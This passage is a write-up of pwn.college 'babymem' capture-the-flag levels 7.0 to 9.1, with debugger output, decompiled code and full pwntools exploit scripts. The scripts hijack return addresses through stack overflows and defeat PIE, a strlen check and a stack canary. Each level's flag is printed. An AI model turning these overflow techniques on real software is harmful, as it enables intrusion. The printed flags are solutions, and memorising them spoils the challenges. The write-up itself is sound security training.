Calculated VA from /home/cub3y0nd/Projects/pwn.college/babymem-level-7-0 = 0x622fffad3000
pwndbg> i fun main
All functions matching regular expression "main":

Non-debugging symbols:
0x0000622fffad53c3  main
0x0000781a2c3f4e40  __libc_start_main
0x0000781a2c404b70  bindtextdomain
0x0000781a2c404bb0  bind_textdomain_codeset
0x0000781a2c4086b0  textdomain
0x0000781a2c4526c0  _IO_switch_to_main_wget_area
0x0000781a2c4de0b0  getdomainname
0x0000781a2c4e5d00  setdomainname
0x0000781a2c4f4b90  __getdomainname_chk
0x0000781a2c506940  __res_nquerydomain
0x0000781a2c506940  res_nquerydomain
0x0000781a2c5069f0  __res_querydomain
0x0000781a2c5069f0  res_querydomain
pwndbg> i fun challenge
All functions matching regular expression "challenge":

Non-debugging symbols:
0x0000622fffad4d0b  challenge
pwndbg> i fun win_authed
All functions matching regular expression "win_authed":

Non-debugging symbols:
0x0000622fffad4bee  win_authed
pwndbg>

Exploit

#!/usr/bin/python3

from pwn import context, ELF, log, pause, process, random, remote, gdb

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-7-0"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


padding_size = 0x38
fixed_offset = b"\x0a"
possible_bytes = [bytes([i]) for i in range(0x0C, 0x10C, 0x10)]


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.recvuntil(b"Payload size: ")
        target.sendline(payload_size)
        target.recvuntil(b"Send your payload")
        target.send(payload)

        response = target.recvall()

        return b"You win!" in response
    except Exception as e:
        log.exception(f"An error occurred: {e}")

        return False


while True:
    try:
        target = launch()

        payload = b"A" * padding_size
        payload += fixed_offset + random.choice(possible_bytes)
        log.info(f"Trying payload: {payload.hex()}")

        if send_payload(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{0svlAHsYG0L-ONps0VQ3ssICrbb.0VMwMDL5cTNxgzW}

Level 7.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary!

Write-up

和上一题一样的，这里就不多赘述了。

Exploit

#!/usr/bin/python3

from pwn import context, ELF, log, pause, process, random, remote, gdb

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-7-1"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


padding_size = 0x88
fixed_offset = b"\x3d"
possible_bytes = [bytes([i]) for i in range(0x08, 0x108, 0x10)]


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.recvuntil(b"Payload size: ")
        target.sendline(payload_size)
        target.recvuntil(b"Send your payload")
        target.send(payload)

        response = target.recvall()

        return b"You win!" in response
    except Exception as e:
        log.exception(f"An error occurred: {e}")


while True:
    try:
        target = launch()

        payload = b"A" * padding_size
        payload += fixed_offset + random.choice(possible_bytes)
        log.info(f"Trying payload: {payload.hex()}")

        if send_payload(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{EC4bj1hO9Oo1kCMvjnoAdmOg2ed.0lMwMDL5cTNxgzW}

Level 8.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary with an additional check on your input.

Write-up

__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  _QWORD v6[3]; // [rsp+0h] [rbp-80h] BYREF
  int v7; // [rsp+1Ch] [rbp-64h]
  size_t size; // [rsp+28h] [rbp-58h] BYREF
  _QWORD v9[4]; // [rsp+30h] [rbp-50h] BYREF
  int v10; // [rsp+50h] [rbp-30h]
  char v11; // [rsp+54h] [rbp-2Ch]
  size_t v12; // [rsp+60h] [rbp-20h]
  int v13; // [rsp+6Ch] [rbp-14h]
  void *buf; // [rsp+70h] [rbp-10h]
  void *dest; // [rsp+78h] [rbp-8h]
  __int64 savedregs; // [rsp+80h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+88h] [rbp+8h] BYREF

  v7 = a1;
  v6[2] = a2;
  v6[1] = a3;
  memset(v9, 0, sizeof(v9));
  v10 = 0;
  v11 = 0;
  dest = v9;
  size = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", dest);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 37);
  puts("large input length, and thus overflow the buffer.\n");
  puts("In this level, there is no \"win\" variable.");
  puts("You will need to force the program to execute the win_authed() function");
  puts("by directly overflowing into the stored return address back to main,");
  printf(
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
    (const void *)rp_,
    rp_ - (_DWORD)dest);
  printf(
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
    rp_ - (_DWORD)dest + 8,
    37);
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)dest - 37);
  puts("and 8 that will overwrite the return address).\n");
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
  puts("- the canary is disabled, otherwise you would corrupt it before");
  puts("overwriting the return address, and the program would abort.");
  puts("Because the binary is position independent, you cannot know");
  puts("exactly where the win_authed() function is located.");
  puts("This means that it is not clear what should be written into the return address.\n");
  printf("Payload size: ");
  __isoc99_scanf("%lu", &size);
  printf("You have chosen to send %lu bytes of input!\n", size);
  printf("This will allow you to write from %p (the start of the input buffer)\n", dest);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)dest + size,
    size - 37);
  printf("Of these, you will overwrite %d bytes into the return address.\n", size + (_DWORD)dest - rp_);
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
  puts("Overwriting the entire return address is fine when we know");
  puts("the whole address, but here, we only really know the last three nibbles.");
  puts("These nibbles never change, because pages are aligned to 0x1000.");
  puts("This gives us a workaround: we can overwrite the least significant byte");
  puts("of the saved return address, which we can know from debugging the binary,");
  puts("to retarget the return to main to any instruction that shares the other 7 bytes.");
  puts("Since that last byte will be constant between executions (due to page alignment),");
  puts("this will always work.");
  puts("If the address we want to redirect execution to is a bit farther away from");
  puts("the saved return address, and we need to write two bytes, then one of those");
  puts("nibbles (the fourth least-significant one) will be a guess, and it will be");
  puts("incorrect 15 of 16 times.");
  puts("This is okay: we can just run our exploit a few times until it works");
  puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times).");
  puts("One caveat in this challenge is that the win_authed() function must first auth:");
  puts("it only lets you win if you provide it with the argument 0x1337.");
  puts("Speifically, the win_authed() function looks something like:");
  puts("    void win_authed(int token)");
  puts("    {");
  puts("      if (token != 0x1337) return;");
  puts("      puts(\"You win! Here is your flag: \");");
  puts("      sendfile(1, open(\"/flag\", 0), 0, 256);");
  puts("      puts(\"\");");
  puts("    }");
  puts(byte_3F3B);
  puts("So how do you pass the check? There *is* a way, and we will cover it later,");
  puts("but for now, we will simply bypass it! You can overwrite the return address");
  puts("with *any* value (as long as it points to executable code), not just the start");
  puts("of functions. Let's overwrite past the token check in win!\n");
  puts("To do this, we will need to analyze the program with objdump, identify where");
  puts("the check is in the win_authed() function, find the address right after the check,");
  puts("and write that address over the saved return address.\n");
  puts("Go ahead and find this address now. When you're ready, input a buffer overflow");
  printf(
    "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n",
    (const void *)rp_,
    rp_ - (_DWORD)dest);
  puts("with the correct value.\n");
  puts("This challenge is careful about reading your input: it will allocate a correctly-sized temporary");
  puts("buffer on the heap, and then copy the data over to the stack. Can you figure out a way to fool");
  puts("this technique and cause an overflow?");
  buf = malloc(size);
  if ( !buf )
    __assert_fail("tmp_input != 0", "/challenge/babymem-level-8-0.c", 0xC0u, "challenge");
  printf("Send your payload (up to %lu bytes)!\n", size);
  v13 = read(0, buf, size);
  puts("Checking length of received string...");
  v12 = strlen((const char *)buf);
  if ( v12 > 0x24 )
    __assert_fail("string_length < 37", "/challenge/babymem-level-8-0.c", 0xC5u, "challenge");
  printf(
    "Passed! We should have enough space for all %d bytes of it on the stack. Copying all %d received bytes!\n",
    v12,
    v13);
  memcpy(dest, buf, v13);
  if ( v13 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v13);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", dest);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the address of win_authed() is %p.\n", win_authed);
  putchar(10);
  puts("If you have managed to overwrite the return address with the correct value,");
  puts("challenge() will jump straight to win_authed() when it returns.");
  printf("Let's try it now!\n\n");
  if ( (unsigned __int64)dest + v13 > rp_ + 2 )
  {
    puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address.");
    puts("         This can still work, because I told you the correct address to use for");
    puts("         this execution, but you should not rely on that information.");
    puts("         You can solve this challenge by only overwriting two bytes!");
    puts("         ");
  }
  puts("Goodbye!");
  return 0LL;
}

我们知道 memcpy 会把我们输入的数据从 buf 复制到 dest，具体复制多少是根据 v13，也就是 read 到的大小决定的，那这就存在了缓冲出溢出问题了。所以思路是我们利用 memcpy 覆盖返回地址控制执行流。

内存我们正常分配就好，这里主要是得设法绕过 v12 > 0x24，也就是 payload 不能大于 36 bytes，很显然这是不现实的，覆盖返回段地址至少要 0x58 bytes。

注意到判断输入长度的函数是 strlen。这个函数根据 Null 字符 \x00 判断字符串是否结束。那么，如果我们在 payload 一开始就写一个 Null 字符，strlen 就会认为字符串长度为零，成功绕过判断。

Breakpoint 1, 0x000055555555622f in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0x7fffffffd160 ◂— 0
 RBX  0x7fffffffe308 —▸ 0x7fffffffe6ba ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-8-0'
 RCX  0x55555555b2a0 ◂— 0xa /* '\n' */
 RDX  1
 RDI  0x7fffffffd160 ◂— 0
 RSI  0x55555555b2a0 ◂— 0xa /* '\n' */
 R8   0x64
 R9   0xffffffff
 R10  0
 R11  0x202
 R12  1
 R13  0
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7fffffffd1b0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0
 RSP  0x7fffffffd130 —▸ 0x7fffffffd160 ◂— 0
 RIP  0x55555555622f (challenge+1522) ◂— call 0x5555555551d0
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x55555555622f <challenge+1522>    call   memcpy@plt                  <memcpy@plt>
        dest: 0x7fffffffd160 ◂— 0
        src: 0x55555555b2a0 ◂— 0xa /* '\n' */
        n: 1

   0x555555556234 <challenge+1527>    cmp    dword ptr [rbp - 0x14], 0
   0x555555556238 <challenge+1531>    jns    challenge+1577              <challenge+1577>

   0x55555555623a <challenge+1533>    call   __errno_location@plt        <__errno_location@plt>

   0x55555555623f <challenge+1538>    mov    eax, dword ptr [rax]
   0x555555556241 <challenge+1540>    mov    edi, eax
   0x555555556243 <challenge+1542>    call   strerror@plt                <strerror@plt>

   0x555555556248 <challenge+1547>    mov    rsi, rax
   0x55555555624b <challenge+1550>    lea    rdi, [rip + 0x21b6]     RDI => 0x555555558408 ◂— 'ERROR: Failed to read input -- %s!\n'
   0x555555556252 <challenge+1557>    mov    eax, 0                  EAX => 0
   0x555555556257 <challenge+1562>    call   printf@plt                  <printf@plt>
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp     0x7fffffffd130 —▸ 0x7fffffffd160 ◂— 0
01:0008│-078     0x7fffffffd138 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f0 ◂— 'SHELL=/usr/bin/zsh'
02:0010│-070     0x7fffffffd140 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6ba ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-8-0'
03:0018│-068     0x7fffffffd148 ◂— 0x1f7e3070b
04:0020│-060     0x7fffffffd150 —▸ 0x555555558770 ◂— 0x2023232300232323 /* '###' */
05:0028│-058     0x7fffffffd158 ◂— 0x6eb
06:0030│ rax rdi 0x7fffffffd160 ◂— 0
07:0038│-048     0x7fffffffd168 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55555555622f challenge+1522
   1   0x55555555649b main+198
   2   0x7ffff7dcae08
   3   0x7ffff7dcaecc __libc_start_main+140
   4   0x55555555526e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> i frame
Stack level 0, frame at 0x7fffffffd1c0:
 rip = 0x55555555622f in challenge; saved rip = 0x55555555649b
 called by frame at 0x7fffffffe1f0
 Arglist at 0x7fffffffd1b0, args:
 Locals at 0x7fffffffd1b0, Previous frame's sp is 0x7fffffffd1c0
 Saved registers:
  rbp at 0x7fffffffd1b0, rip at 0x7fffffffd1b8
pwndbg> dist 0x7fffffffd160 0x7fffffffd1b8
0x7fffffffd160->0x7fffffffd1b8 is 0x58 bytes (0xb words)
pwndbg>

Exploit

#!/usr/bin/python3

from pwn import context, ELF, log, pause, process, random, remote, gdb

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-8-0"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
b *challenge+1421
b *challenge+1502
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


null = b"\x00"
padding = b"".ljust(0x58 - 0x1, b"A")
fixed_offset = b"\x3c"
possible_bytes = [bytes([i]) for i in range(0x0B, 0x10B, 0x10)]


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.recvuntil(b"Payload size: ")
        target.sendline(payload_size)
        target.recvuntil(b"Send your payload")
        target.send(payload)

        response = target.recvall()

        return b"You win!" in response
    except Exception as e:
        log.exception(f"An error occurred: {e}")


while True:
    try:
        target = launch(debug=False)

        payload = null + padding
        payload += fixed_offset + random.choice(possible_bytes)
        log.info(f"Trying payload: {payload.hex()}")

        if send_payload(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{82SpQ2oiZjETn254hnZR69O97tP.01MwMDL5cTNxgzW}

Level 8.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary with an additional check on your input.

Write-up

不多说，参考上一题。

Exploit

#!/usr/bin/python3

from pwn import context, ELF, log, pause, process, random, remote, gdb

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-8-1"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
b *challenge+259
b *challenge+326
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


null = b"\x00"
padding = b"".ljust(0x68 - 0x1, b"A")
fixed_offset = b"\x5a"
possible_bytes = [bytes([i]) for i in range(0x0F, 0x10F, 0x10)]


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.recvuntil(b"Payload size: ")
        target.sendline(payload_size)
        target.recvuntil(b"Send your payload")
        target.send(payload)

        response = target.recvall()

        return b"You win!" in response
    except Exception as e:
        log.exception(f"An error occurred: {e}")


while True:
    try:
        target = launch(debug=False)

        payload = null + padding
        payload += fixed_offset + random.choice(possible_bytes)
        log.info(f"Trying payload: {payload.hex()}")

        if send_payload(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{orn4FN_Dc8Po8bG2OX-G3dcj8Pr.0FNwMDL5cTNxgzW}

Level 9.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a PIE binary with a stack canary. Be warned, this requires careful and clever payload construction!

Write-up

__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  int v3; // eax
  int *v4; // rax
  char *v5; // rax
  _QWORD v7[3]; // [rsp+0h] [rbp-80h] BYREF
  int v8; // [rsp+1Ch] [rbp-64h]
  int v9; // [rsp+24h] [rbp-5Ch]
  unsigned __int64 v10; // [rsp+28h] [rbp-58h] BYREF
  char *v11; // [rsp+30h] [rbp-50h]
  int *v12; // [rsp+38h] [rbp-48h]
  _QWORD v13[6]; // [rsp+40h] [rbp-40h] BYREF
  int v14; // [rsp+70h] [rbp-10h] BYREF
  unsigned __int64 v15; // [rsp+78h] [rbp-8h]
  __int64 savedregs; // [rsp+80h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+88h] [rbp+8h] BYREF

  v8 = a1;
  v7[2] = a2;
  v7[1] = a3;
  v15 = __readfsqword(0x28u);
  memset(v13, 0, sizeof(v13));
  v14 = 0;
  v11 = (char *)v13;
  v12 = &v14;
  v10 = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)v7;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v7) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", v11);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 48);
  puts("large input length, and thus overflow the buffer.\n");
  puts("In this level, there is no \"win\" variable.");
  puts("You will need to force the program to execute the win_authed() function");
  puts("by directly overflowing into the stored return address back to main,");
  printf(
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
    (const void *)rp_,
    rp_ - (_DWORD)v11);
  printf(
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
    rp_ - (_DWORD)v11 + 8,
    48);
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)v11 - 48);
  puts("and 8 that will overwrite the return address).\n");
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  puts("While canaries are enabled, this program reads your input 1 byte at a time,");
  puts("tracking how many bytes have been read and the offset from your input buffer");
  puts("to read the byte to using a local variable on the stack.");
  puts("The code for doing this looks something like:");
  puts("    while (n < size) {");
  puts("      n += read(0, input + n, 1);");
  puts("    }");
  puts("As it turns out, you can use this local variable `n` to jump over the canary.");
  printf("Your input buffer is stored at %p, and this local variable `n`\n", v11);
  printf("is stored %d bytes after it at %p.\n\n", (_DWORD)v12 - (_DWORD)v11, v12);
  puts("When you overwrite `n`, you will change the program's understanding of");
  puts("how many bytes it has read in so far, and when it runs `read(0, input + n, 1)`");
  puts("again, it will read into an offset that you control.");
  puts("This will allow you to reposition the write *after* the canary, and write");
  puts("into the return address!\n");
  puts("The payload size is deceptively simple.");
  puts("You don't have to think about how many bytes you will end up skipping:");
  puts("with the while loop described above, the payload size marks the");
  puts("*right-most* byte that will be read into.");
  puts("As far as this challenge is concerned, there is no difference between bytes");
  puts("\"skipped\" by fiddling with `n` and bytes read in normally: the values");
  puts("of `n` and `size` are all that matters to determine when to stop reading,");
  puts("*not* the number of bytes actually read in.\n");
  puts("That being said, you *do* need to be careful on the sending side: don't send");
  puts("the bytes that you're effectively skipping!\n");
  puts("Because the binary is position independent, you cannot know");
  puts("exactly where the win_authed() function is located.");
  puts("This means that it is not clear what should be written into the return address.\n");
  printf("Payload size: ");
  __isoc99_scanf("%lu", &v10);
  printf("You have chosen to send %lu bytes of input!\n", v10);
  printf("This will allow you to write from %p (the start of the input buffer)\n", v11);
  printf("right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", &v11[v10], v10 - 48);
  printf("Of these, you will overwrite %d bytes into the return address.\n", v10 + (_DWORD)v11 - rp_);
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
  puts("Overwriting the entire return address is fine when we know");
  puts("the whole address, but here, we only really know the last three nibbles.");
  puts("These nibbles never change, because pages are aligned to 0x1000.");
  puts("This gives us a workaround: we can overwrite the least significant byte");
  puts("of the saved return address, which we can know from debugging the binary,");
  puts("to retarget the return to main to any instruction that shares the other 7 bytes.");
  puts("Since that last byte will be constant between executions (due to page alignment),");
  puts("this will always work.");
  puts("If the address we want to redirect execution to is a bit farther away from");
  puts("the saved return address, and we need to write two bytes, then one of those");
  puts("nibbles (the fourth least-significant one) will be a guess, and it will be");
  puts("incorrect 15 of 16 times.");
  puts("This is okay: we can just run our exploit a few times until it works");
  puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times).");
  puts("One caveat in this challenge is that the win_authed() function must first auth:");
  puts("it only lets you win if you provide it with the argument 0x1337.");
  puts("Speifically, the win_authed() function looks something like:");
  puts("    void win_authed(int token)");
  puts("    {");
  puts("      if (token != 0x1337) return;");
  puts("      puts(\"You win! Here is your flag: \");");
  puts("      sendfile(1, open(\"/flag\", 0), 0, 256);");
  puts("      puts(\"\");");
  puts("    }");
  puts(byte_440D);
  puts("So how do you pass the check? There *is* a way, and we will cover it later,");
  puts("but for now, we will simply bypass it! You can overwrite the return address");
  puts("with *any* value (as long as it points to executable code), not just the start");
  puts("of functions. Let's overwrite past the token check in win!\n");
  puts("To do this, we will need to analyze the program with objdump, identify where");
  puts("the check is in the win_authed() function, find the address right after the check,");
  puts("and write that address over the saved return address.\n");
  puts("Go ahead and find this address now. When you're ready, input a buffer overflow");
  printf(
    "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n",
    (const void *)rp_,
    rp_ - (_DWORD)v11);
  puts("with the correct value.\n");
  printf("Send your payload (up to %lu bytes)!\n", v10);
  while ( *v12 < v10 )
  {
    printf("About to read 1 byte to %p, this is %d bytes away from the start of the input buffer.\n", &v11[*v12], *v12);
    v3 = read(0, &v11[*v12], 1uLL);
    *v12 += v3;
  }
  v9 = *v12;
  if ( v9 < 0 )
  {
    v4 = __errno_location();
    v5 = strerror(*v4);
    printf("ERROR: Failed to read input -- %s!\n", v5);
    exit(1);
  }
  printf("You sent %d bytes!\n", v9);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", v11);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  printf("- the address of the number of bytes read counter and read offset is %p.\n", v12);
  printf("- the address of win_authed() is %p.\n", win_authed);
  putchar(10);
  puts("If you have managed to overwrite the return address with the correct value,");
  puts("challenge() will jump straight to win_authed() when it returns.");
  printf("Let's try it now!\n\n");
  if ( (unsigned __int64)&v11[v9] > rp_ + 2 )
  {
    puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address.");
    puts("         This can still work, because I told you the correct address to use for");
    puts("         this execution, but you should not rely on that information.");
    puts("         You can solve this challenge by only overwriting two bytes!");
    puts("         ");
  }
  puts("Goodbye!");
  return 0LL;
}

这题的漏洞在于没有对数组索引做是否超出数组容量的判断，导致可以通过数组越界在任意内存处写入数据。

while ( *v12 < v10 )
{
  printf("About to read 1 byte to %p, this is %d bytes away from the start of the input buffer.\n", &v11[*v12], *v12);
  v3 = read(0, &v11[*v12], 1uLL);
  *v12 += v3;
}

我们知道 v10 是我们提供的任意大小。程序内部通过一个 while 循环从零开始向 v13 数组读入数据，一次一字节，每次写完后将 *v12 加上本次读入字节数，也就是加一，以此指向下一个内存单元。这个过程一共写 v10 次。

由于读入数据的实现是 read(0, &v11[*v12], 1uLL)，这会将一个字节读到 &v11[*v12] 这个地址。*v12 是从零开始的索引，v11 保存的是输入缓冲区的起始地址。

如果我们将输入缓冲区填满，再多写入一个字节就会覆盖索引 *v12 的值。如果我们把索引设为我们想写入的位置，就实现了任意位置写。因此这里我们只需要计算要覆盖的返回地址和输入缓冲区起始位置之间的距离即可，用这个距离覆盖索引值来修改返回地址。

不过根据程序逻辑，我们是先判断 *v12 < v10 是否成立，成立则读入一个字节到 &v11[*v12]，然后将 *v12 加一，回到判断，如果还是小于 v10 就再读入一个字节到指定位置。因此我们计算出输入缓冲区起始位置到返回地址之间的距离后应该将其减一，用这个值来覆盖索引值，这样才能做到下一次读入的位置是我们想覆盖的目标地址。

这个程序是开启了 Canary 和 PIE 保护的，不过因为数组越界写的漏洞存在，我们可以直接跳过 Canary 覆盖返回地址。因为有 PIE，而我们通过页偏移的方式定位要执行的指令，所以我们最后只需要两个字节来覆盖返回地址。这里需要注意的是，payload 结构是用来填充数组的 padding + 用来重定位写入索引的一字节 + 用来重定位执行流的两字节页偏移。如果我们将这个 payload 大小作为 v10 的话，得到的可输入大小是数组大小加三，但是我们的返回地址肯定在一个比较高的位置，导致 *v12 < v10 这条检测失败，不会去覆盖返回地址。所以为了绕过这个判断，我们实际需要的输入大小应该是用来重定位写入的索引的值加三，那这不够的大小就需要我们通过在 payload 末尾再加一段 padding 实现。当然你也可以手动指定最大输入大小就是了…

Exploit

#!/usr/bin/python3

from pwn import context, ELF, log, pause, process, random, remote, gdb

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-9-0"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
b *challenge+1786
b *challenge+1816
b *challenge+1825
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


destination = b"\x47"
fixed_offset = b"\x84"
possible_bytes = [bytes([i]) for i in range(0x06, 0x106, 0x10)]
padding = b"".ljust(0x30, b"A") + destination
extra_padding = b"".ljust(0x17, b"A")


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.recvuntil(b"Payload size: ")
        target.sendline(payload_size)
        target.recvuntil(b"Send your payload")
        target.send(payload)

        response = target.recvall()
        # pause()

        return b"You win!" in response
    except Exception as e:
        log.exception(f"An error occurred: {e}")


while True:
    try:
        target = launch(debug=False)

        payload = padding
        payload += fixed_offset + random.choice(possible_bytes)
        payload += extra_padding
        log.info(f"Trying payload: {payload.hex()}")

        if send_payload(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{QccZPJ6VBhlEFtdfJdexxhwYSnh.0VNwMDL5cTNxgzW}

Level 9.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a PIE binary with a stack canary. Be warned, this requires careful and clever payload construction!

Write-up

__int64 challenge()
{
  int v0; // eax
  int *v1; // rax
  char *v2; // rax
  unsigned __int64 v4; // [rsp+28h] [rbp-88h] BYREF
  _BYTE *v5; // [rsp+30h] [rbp-80h]
  int *v6; // [rsp+38h] [rbp-78h]
  _BYTE v7[96]; // [rsp+40h] [rbp-70h] BYREF
  int v8; // [rsp+A0h] [rbp-10h] BYREF
